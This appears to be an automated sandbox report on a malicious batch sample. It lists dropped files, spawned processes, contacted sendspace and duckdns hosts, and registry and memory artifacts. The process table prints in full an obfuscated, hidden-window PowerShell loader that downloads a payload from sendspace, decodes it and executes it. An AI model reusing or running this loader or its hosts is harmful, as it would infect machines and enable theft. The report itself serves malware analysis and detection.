Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
xff.cmd
|
ASCII text, with very long lines (6371), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1c0vfxcq.np5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2a2rp1yz.umu.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_44feiqn3.21f.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qnlqbymi.shr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Bevogtes140.Out
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4A1AT7E39JLZVVKFKZ16.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\xff.cmd" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing
-lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function
Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW
lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr
Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant
oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo
/Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap
';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta
NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st
';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses
= Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr.
Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. ';Semuljegrynets (Ugedagens 'Re,et$ lectg
DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco
Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets
(Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes
Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling)
.nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi
Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN
evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets
(Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk
paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens
'Gra.e$ BalsFForese F.ageOmulcrLanitiTeleke Hyo,.BndslDPlug.o aliwLi,ienab omlKl,rio N.anaAfsted Pej.FoverciOmnislUnemeeMotor(
Al.u$SteriF Pro lStadfuMensue.mpaprBrachnhovedeCone.sSkann,Slugt$HjemoTEpideiLavarl ChirbInt,riKarakn thmdSmuttiunfe nUdflygId
nteaft rnGarde)Befun ';$Tilbindingen=$Applausers[0];Semuljegrynets (Ugedagens ' Geni$ BevigFremelK dduo Dekabd dakaP eanlFigul:DeklaN
AxiooIndehnOsmosfTekstlSup raSuperkOpra.yRemis=Spe d(CionoT,denreStet s AlmatCirku-DewdaPAffila .olmt.jalthTwe,d .nkbl$readoT.estii
Hu.tlAntimbFartpi Sn,dn UpopdLawt,iStrifn.angsgangore Miran,ryde)Xenof ');while (!$Nonflaky) {Semuljegrynets (Ugedagens 'Uh.ld$MaidugTotemlAflysoSaurabSyneraklatplFo,sk:CoaduDNon.deNordsvNig.aoLeekin
HemaiFarvnc Flek=U,hoa$ UdkatMo olrMiskru RumseJubil ') ;Semuljegrynets $aktualitetens;Semuljegrynets (Ugedagens 'RevisSBurgjt
Di ra.eniorAcce,t Blea-BarneSRavrrlAgnateBgenoe ,ubgp kti Ureel4An,el ');Semuljegrynets (Ugedagens ' illi$ eskngDeta lSubinoAdjudb
Lac.aRacoylForso:OptllN TranoB.llinEufomf OmpllB.curaUnu.dk WhipyDomfl=Genr,(IloneTStoe,eOverpsTo.metDesmo-trimaP.estaaLagritTeatehB,dde
hatt$ AilaT ,impiF,edrl AlisbInfori AnginPotlidDknini FisknSporvg HemieFuld.n Sept)Smede ') ;Semuljegrynets (Ugedagens 'Tiend$Udls
gRedonlDosisoCauksbK,binaRaadflJor.i:C,mplCFornaiPhonogKrydsaK,mmarO.eroeTykketSsur.tBa ngeVsentsAdjud=Acucl$Fuldbg,ddanlReingoHostibBeesta,uldrlBowle:Muf.eB
Strar.resbe arrov BladsMa efp l apr SvrdkMonadkTungme I.terHyrac1Panto5Tundr1Afdry+Trout+Stilh% kseg$Bill,FMonotoBjergrcottovFugeraToyoty,rugt.Het.rcSargaoLoudmuConganIntegtExoco
') ;$Fluernes=$Forvay[$Cigarettes];}$Efteruddannelseskurser=338899;$Beloebsfeltet=27394;Semuljegrynets (Ugedagens ' A ro$
ContgKnobkl AjleoBarnab.rikiaEgoizlv deo:Lillys SeedpNedsaebe,ovrSaladmList iBes adNonheuPldhycEjendtSup r N.wsi= St f DegnG
StabeCarcatSerri-BulleCBa.ksoV ndbnHorsttBathmeStroenVin.etUdtm. Nonse$BundfTAfbili,pardlSpirabTraveiBibelnSme.edMlteni.efaun.raoagNeuroeNonpenCh,lc
');Semuljegrynets (Ugedagens 'Di.se$UdbrygAnnonlForbioB.thibMindsaEl,rkl Fire:.loksFVgtfoor.sterHconvo An rmB.dpltNusseaMagellMois.e
Gale Pr im= nwie Voldt[ PrinSGehreyChro sAfhort.tymoeSikrpm In.i.Regl,C,ndsnoBer,anMedlevDekoreSarcorLidertInder]Afta.:Aniss:AutomFSynovrIn
idoPejsemValgkBfou,iaIndlasmors e .dga6Data.4 L,ckSFlaggtTr sar MaalitroklnV.erkgDrupe(route$.orylsUpperpInputeRifarrDramamNgst.iNoncedUnco
uFlankcUdtrttGangb)Infid ');Semuljegrynets (Ugedagens ' Un,e$Rero gDistrlFissuoHilmabA rhaac,mshlAnalk:Fje,nKIncunoPlowmnTilpag
,oriePy.rhb BularForbieAb,egvHeter hum,n=Re,de Knog [ SuprSKala ySoc.as UldhttalocesimulmHstes.akv rTArroweStargx PeattKlubb.TusinEimpornUdspec
RelioLystbdBi.eliNickonBil.bgValb ]D fte:Stats:SuberA SlskSkontrCRetsaI OverIk non.A melGLandie m.netManucS Mo.otTransr,riasiSk.dsnParadg
Pr.e(Bj.in$SammeF Il,uoNonr.rW,otho Instm agmstHerpea ypefls oveeA kai)Chelp ');Semuljegrynets (Ugedagens ' Opte$Raa,kgRo.telN,nteoV.nstbHexapaAudi.l,omis:Forl
P forsrPate eSmagssVejfabMultiyCajoloMis.ppW.ndshScr.mrRic,de ,oldnUnposiFemaaaPhleb=Me et$LinieKbewimoVisconScholgMastueUnabubSepulr
Choreafri,v Fa,t.Lrerfs Affau Tablb TokesOverstFa.skr Sh.piV tninButl.gSynes(P,ero$Min fEAfg nfYarritAnkeleRedourTipseuP obidOrdovd
nbja acuon For nNabose HusklSrprgsNewmae JalosCongekOdomeuG mmirKvalisFakuleBaromrBrant, Gele$ TarsB.ehfteYawpslTest oLezzieUltr.bNoncosBalanfK,rrieHoofsl
ilfrtDeviee.atemtUdgan) Phra ');Semuljegrynets $Presbyophrenia;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function
Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke(
$Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens
'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas
W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha
ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1
Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens '
Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke.
Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq
Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses
= Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr.
Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. ';Semuljegrynets (Ugedagens 'Re,et$ lectg
DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco
Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets
(Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes
Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling)
.nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi
Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN
evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets
(Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk
paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens
'Gra.e$ BalsFForese F.ageOmulcrLanitiTeleke Hyo,.BndslDPlug.o aliwLi,ienab omlKl,rio N.anaAfsted Pej.FoverciOmnislUnemeeMotor(
Al.u$SteriF Pro lStadfuMensue.mpaprBrachnhovedeCone.sSkann,Slugt$HjemoTEpideiLavarl ChirbInt,riKarakn thmdSmuttiunfe nUdflygId
nteaft rnGarde)Befun ';$Tilbindingen=$Applausers[0];Semuljegrynets (Ugedagens ' Geni$ BevigFremelK dduo Dekabd dakaP eanlFigul:DeklaN
AxiooIndehnOsmosfTekstlSup raSuperkOpra.yRemis=Spe d(CionoT,denreStet s AlmatCirku-DewdaPAffila .olmt.jalthTwe,d .nkbl$readoT.estii
Hu.tlAntimbFartpi Sn,dn UpopdLawt,iStrifn.angsgangore Miran,ryde)Xenof ');while (!$Nonflaky) {Semuljegrynets (Ugedagens 'Uh.ld$MaidugTotemlAflysoSaurabSyneraklatplFo,sk:CoaduDNon.deNordsvNig.aoLeekin
HemaiFarvnc Flek=U,hoa$ UdkatMo olrMiskru RumseJubil ') ;Semuljegrynets $aktualitetens;Semuljegrynets (Ugedagens 'RevisSBurgjt
Di ra.eniorAcce,t Blea-BarneSRavrrlAgnateBgenoe ,ubgp kti Ureel4An,el ');Semuljegrynets (Ugedagens ' illi$ eskngDeta lSubinoAdjudb
Lac.aRacoylForso:OptllN TranoB.llinEufomf OmpllB.curaUnu.dk WhipyDomfl=Genr,(IloneTStoe,eOverpsTo.metDesmo-trimaP.estaaLagritTeatehB,dde
hatt$ AilaT ,impiF,edrl AlisbInfori AnginPotlidDknini FisknSporvg HemieFuld.n Sept)Smede ') ;Semuljegrynets (Ugedagens 'Tiend$Udls
gRedonlDosisoCauksbK,binaRaadflJor.i:C,mplCFornaiPhonogKrydsaK,mmarO.eroeTykketSsur.tBa ngeVsentsAdjud=Acucl$Fuldbg,ddanlReingoHostibBeesta,uldrlBowle:Muf.eB
Strar.resbe arrov BladsMa efp l apr SvrdkMonadkTungme I.terHyrac1Panto5Tundr1Afdry+Trout+Stilh% kseg$Bill,FMonotoBjergrcottovFugeraToyoty,rugt.Het.rcSargaoLoudmuConganIntegtExoco
') ;$Fluernes=$Forvay[$Cigarettes];}$Efteruddannelseskurser=338899;$Beloebsfeltet=27394;Semuljegrynets (Ugedagens ' A ro$
ContgKnobkl AjleoBarnab.rikiaEgoizlv deo:Lillys SeedpNedsaebe,ovrSaladmList iBes adNonheuPldhycEjendtSup r N.wsi= St f DegnG
StabeCarcatSerri-BulleCBa.ksoV ndbnHorsttBathmeStroenVin.etUdtm. Nonse$BundfTAfbili,pardlSpirabTraveiBibelnSme.edMlteni.efaun.raoagNeuroeNonpenCh,lc
');Semuljegrynets (Ugedagens 'Di.se$UdbrygAnnonlForbioB.thibMindsaEl,rkl Fire:.loksFVgtfoor.sterHconvo An rmB.dpltNusseaMagellMois.e
Gale Pr im= nwie Voldt[ PrinSGehreyChro sAfhort.tymoeSikrpm In.i.Regl,C,ndsnoBer,anMedlevDekoreSarcorLidertInder]Afta.:Aniss:AutomFSynovrIn
idoPejsemValgkBfou,iaIndlasmors e .dga6Data.4 L,ckSFlaggtTr sar MaalitroklnV.erkgDrupe(route$.orylsUpperpInputeRifarrDramamNgst.iNoncedUnco
uFlankcUdtrttGangb)Infid ');Semuljegrynets (Ugedagens ' Un,e$Rero gDistrlFissuoHilmabA rhaac,mshlAnalk:Fje,nKIncunoPlowmnTilpag
,oriePy.rhb BularForbieAb,egvHeter hum,n=Re,de Knog [ SuprSKala ySoc.as UldhttalocesimulmHstes.akv rTArroweStargx PeattKlubb.TusinEimpornUdspec
RelioLystbdBi.eliNickonBil.bgValb ]D fte:Stats:SuberA SlskSkontrCRetsaI OverIk non.A melGLandie m.netManucS Mo.otTransr,riasiSk.dsnParadg
Pr.e(Bj.in$SammeF Il,uoNonr.rW,otho Instm agmstHerpea ypefls oveeA kai)Chelp ');Semuljegrynets (Ugedagens ' Opte$Raa,kgRo.telN,nteoV.nstbHexapaAudi.l,omis:Forl
P forsrPate eSmagssVejfabMultiyCajoloMis.ppW.ndshScr.mrRic,de ,oldnUnposiFemaaaPhleb=Me et$LinieKbewimoVisconScholgMastueUnabubSepulr
Choreafri,v Fa,t.Lrerfs Affau Tablb TokesOverstFa.skr Sh.piV tninButl.gSynes(P,ero$Min fEAfg nfYarritAnkeleRedourTipseuP obidOrdovd
nbja acuon For nNabose HusklSrprgsNewmae JalosCongekOdomeuG mmirKvalisFakuleBaromrBrant, Gele$ TarsB.ehfteYawpslTest oLezzieUltr.bNoncosBalanfK,rrieHoofsl
ilfrtDeviee.atemtUdgan) Phra ');Semuljegrynets $Presbyophrenia;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
dhhj.duckdns.org
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://fs03n5.sendspace.com/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://fs03n5.sendspace.com/dlpro/2e5b0068e88ecbc579c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/w4e2qbP
|
unknown
|
||
|
https://fs13n2.sendspace.com/dlpro/5990f4102977ad47c8b1158344464586/664f92e4/w4e2qb/Bystoerrelse.fla
|
69.31.136.57
|
||
|
http://fs13n2.sendspace.com
|
unknown
|
||
|
http://www.sendspace.com
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/w4e2qb
|
104.21.28.80
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://fs13n2.sendspace.com
|
unknown
|
||
|
https://www.sendspace.com
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/w4e2qbXR
|
unknown
|
||
|
https://www.sendspace.com/
|
unknown
|
||
|
https://fs03n5.sendspace.com/hf
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://fs13n2.sendspaX
|
unknown
|
||
|
https://fs03n5.sendspace.com/dlpro/2e5b0068e88ecbc579c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold98.bin
|
69.31.136.17
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://fs03n5.sendspace.com/om:443
|
unknown
|
||
|
https://fs03n5.sendspace.com/79c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold98.bin
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/6f2c5c
|
104.21.28.80
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 20 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
dhhj.duckdns.org
|
12.202.180.134
|
|
|
|
fs13n2.sendspace.com
|
69.31.136.57
|
||
|
fs03n5.sendspace.com
|
69.31.136.17
|
||
|
www.sendspace.com
|
104.21.28.80
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
12.202.180.134
|
dhhj.duckdns.org
|
United States
|
|
|
|
69.31.136.17
|
fs03n5.sendspace.com
|
United States
|
||
|
104.21.28.80
|
www.sendspace.com
|
United States
|
||
|
69.31.136.57
|
fs13n2.sendspace.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
23691000
|
trusted library allocation
|
page read and write
|
|
|
|
5E20000
|
trusted library allocation
|
page read and write
|
|
|
|
9FF9000
|
direct allocation
|
page execute and read and write
|
|
|
|
17BCF83F000
|
trusted library allocation
|
page read and write
|
|
|
|
8AD0000
|
direct allocation
|
page execute and read and write
|
|
|
|
A9F9000
|
direct allocation
|
page execute and read and write
|
||
|
17BCF7D1000
|
trusted library allocation
|
page read and write
|
||
|
17BD7B7A000
|
heap
|
page read and write
|
||
|
17BD7B0E000
|
heap
|
page read and write
|
||
|
8890000
|
trusted library allocation
|
page read and write
|
||
|
23640000
|
trusted library allocation
|
page read and write
|
||
|
79BE000
|
stack
|
page read and write
|
||
|
234A9000
|
trusted library allocation
|
page read and write
|
||
|
7BB0000
|
direct allocation
|
page read and write
|
||
|
22C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2ED0000
|
heap
|
page read and write
|
||
|
25B1D000
|
stack
|
page read and write
|
||
|
23614000
|
trusted library allocation
|
page read and write
|
||
|
17BBD820000
|
heap
|
page read and write
|
||
|
51B0000
|
trusted library allocation
|
page read and write
|
||
|
7880000
|
direct allocation
|
page read and write
|
||
|
22C0000
|
trusted library allocation
|
page read and write
|
||
|
7778000
|
heap
|
page read and write
|
||
|
25691000
|
heap
|
page read and write
|
||
|
C7F9000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD346C4000
|
trusted library allocation
|
page read and write
|
||
|
17BBD825000
|
heap
|
page read and write
|
||
|
17BBF5F4000
|
heap
|
page read and write
|
||
|
7FFD34A20000
|
trusted library allocation
|
page read and write
|
||
|
17BD7AC0000
|
heap
|
page execute and read and write
|
||
|
17BBFC63000
|
trusted library allocation
|
page read and write
|
||
|
7390000
|
heap
|
page read and write
|
||
|
233AC000
|
stack
|
page read and write
|
||
|
7A00000
|
trusted library allocation
|
page execute and read and write
|
||
|
25E1D000
|
stack
|
page read and write
|
||
|
7FFD346C2000
|
trusted library allocation
|
page read and write
|
||
|
17BC159A000
|
trusted library allocation
|
page read and write
|
||
|
17BBFC52000
|
trusted library allocation
|
page read and write
|
||
|
236F9000
|
trusted library allocation
|
page read and write
|
||
|
1598D76000
|
stack
|
page read and write
|
||
|
71A0000
|
direct allocation
|
page read and write
|
||
|
3002000
|
heap
|
page read and write
|
||
|
7FFD34940000
|
trusted library allocation
|
page read and write
|
||
|
15995B7000
|
stack
|
page read and write
|
||
|
17BC1698000
|
trusted library allocation
|
page read and write
|
||
|
78C8000
|
trusted library allocation
|
page read and write
|
||
|
17BBD928000
|
heap
|
page read and write
|
||
|
2EFD000
|
stack
|
page read and write
|
||
|
17BBF7D1000
|
trusted library allocation
|
page read and write
|
||
|
7EF0000
|
heap
|
page read and write
|
||
|
3230000
|
trusted library allocation
|
page read and write
|
||
|
8AB0000
|
trusted library allocation
|
page read and write
|
||
|
7CE0000
|
heap
|
page read and write
|
||
|
25790000
|
heap
|
page execute and read and write
|
||
|
23410000
|
heap
|
page execute and read and write
|
||
|
17BC158B000
|
trusted library allocation
|
page read and write
|
||
|
17BBF5F6000
|
heap
|
page read and write
|
||
|
797E000
|
stack
|
page read and write
|
||
|
305E000
|
stack
|
page read and write
|
||
|
31CF000
|
stack
|
page read and write
|
||
|
2345E000
|
stack
|
page read and write
|
||
|
235BC000
|
stack
|
page read and write
|
||
|
7DD2000
|
heap
|
page read and write
|
||
|
159953C000
|
stack
|
page read and write
|
||
|
25739000
|
heap
|
page read and write
|
||
|
25FDD000
|
stack
|
page read and write
|
||
|
722D000
|
stack
|
page read and write
|
||
|
C4EFCFE000
|
unkown
|
page read and write
|
||
|
28B34AC4000
|
heap
|
page read and write
|
||
|
7A80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
|
15997BE000
|
stack
|
page read and write
|
||
|
300F000
|
heap
|
page read and write
|
||
|
71D0000
|
direct allocation
|
page read and write
|
||
|
17BC1576000
|
trusted library allocation
|
page read and write
|
||
|
17BBFCC7000
|
trusted library allocation
|
page read and write
|
||
|
23640000
|
trusted library allocation
|
page read and write
|
||
|
778F000
|
heap
|
page read and write
|
||
|
28B34A20000
|
heap
|
page read and write
|
||
|
17BBD92A000
|
heap
|
page read and write
|
||
|
17BD7BB7000
|
heap
|
page read and write
|
||
|
7D57000
|
heap
|
page read and write
|
||
|
22F7000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34776000
|
trusted library allocation
|
page read and write
|
||
|
17BC0045000
|
trusted library allocation
|
page read and write
|
||
|
7A90000
|
trusted library allocation
|
page read and write
|
||
|
234AB000
|
trusted library allocation
|
page read and write
|
||
|
17BBF66B000
|
heap
|
page read and write
|
||
|
22CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
323D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34960000
|
trusted library allocation
|
page read and write
|
||
|
7F2C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3233000
|
trusted library allocation
|
page execute and read and write
|
||
|
17BBD932000
|
heap
|
page read and write
|
||
|
84C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
17BC002F000
|
trusted library allocation
|
page read and write
|
||
|
17BBD7E0000
|
heap
|
page read and write
|
||
|
342F000
|
stack
|
page read and write
|
||
|
159927E000
|
stack
|
